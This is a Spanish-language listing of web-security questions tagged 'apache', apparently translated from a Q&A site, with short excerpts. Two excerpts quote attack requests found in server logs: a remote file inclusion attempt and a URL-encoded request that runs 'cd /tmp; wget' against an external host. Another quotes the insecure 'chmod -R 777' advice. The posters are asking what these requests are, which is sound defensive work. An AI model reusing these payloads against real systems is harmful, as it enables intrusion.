Preguntas con etiqueta 'apache'

preguntas con etiqueta
3
respuestas

¿Es seguro usar este servidor ftp incorporado?

Estamos utilizando un paquete de software para la automatización del tráfico FTP. Utiliza el componente Apache Mina FtServer como un servidor FTP incorporado (para FTPS y SFTP). El uso de esta biblioteca se ha marcado como un problema de se...
hecha 13.07.2017 - 16:29
4
respuestas

Ambiente seguro para servidores con datos privados confidenciales

Estoy desarrollando una aplicación web que expondrá una API pública al mundo, pero almacenará datos personales muy confidenciales y privados. Tener el contenido hackeado sería fatal. Estaré usando las siguientes tecnologías: REST (sobre H...
hecha 10.12.2015 - 13:39
2
respuestas

¿Cómo debo bloquear los nombres de dominio no deseados? [duplicar]

Me he dado cuenta de que alguien apuntó su dominio a mi dirección IP dedicada y ahora mi sitio web se puede ver usando su nombre de dominio @ example.com. Esto puede dañar mi SE Traffic y SEO de muchas maneras. ¿Cómo puedo bloquear este domini...
hecha 06.10.2015 - 12:46
5
respuestas

¿Cuál es la mejor manera de asegurar sus recursos web cuando proporciona API como servicio web?

Aquí está la condición: Tengo una API de servicio web que planeo vender como servicio. La salida de la API contiene la URI de algunos recursos (por ejemplo, imágenes, videos) que deberían ser accesibles para ese tipo que usa la API. Exponer e...
hecha 23.02.2017 - 07:46
1
respuesta

¿Cuáles son los riesgos de administrar mal los usuarios / permisos de Apache y cuál es la manera correcta de hacerlo?

Cada vez que instalo Apache para probar un script, me surge esta pregunta. No lo hago muy a menudo, pero recuerdo que este es un punto difícil desde 2007. Muchos tutoriales / foros recomiendan utilizar: sudo chmod -R 777 /var/www/ ¡Pero...
hecha 17.05.2018 - 20:13
2
respuestas

¿Cuál es la mejor manera de prevenir la inyección de código en Apache / PHP?

Recientemente he configurado WordPress en un VPS, y está bajo ataque continuo desde entonces. Tomé algunas medidas para protegerme de algunos ataques de fuerza bruta, sin embargo, al observar algunos de los registros no estoy seguro de si eso es...
hecha 02.11.2017 - 12:39
1
respuesta

Cerrar sesión de autenticación HTTP básica

Como se ve en enlace , hay algunas formas interesantes de cerrar la sesión de un usuario desde la autenticación básica HTTP. Actualmente estoy enviando un HTTP 401 para hacerlo así: GET logout.php <?php header('HTTP/1.1 401 Unautho...
hecha 30.09.2014 - 21:00
3
respuestas

¿Es segura la aplicación web en una carpeta no pública?

Me pregunto si es realmente seguro usar esta estructura de mi aplicación web. WEBAPP Application Controllers Models Views ... Framework ... Core Public ... index.php...
hecha 27.04.2014 - 11:37
3
respuestas

¿Ataque de raíz del servidor?

Alguien en Hungría intentó algo extraño recientemente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Esta es la URL parcial de mi registro, que muestra la página a la que fueron. Dieron la URL de mi sitio como referente. ¿Qué...
hecha 06.04.2013 - 13:08
1
respuesta

¿Cómo podría funcionar este ataque?

Estaba explorando mis registros de apache y encontré la siguiente solicitud (que resultó en un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32...
hecha 26.03.2017 - 20:29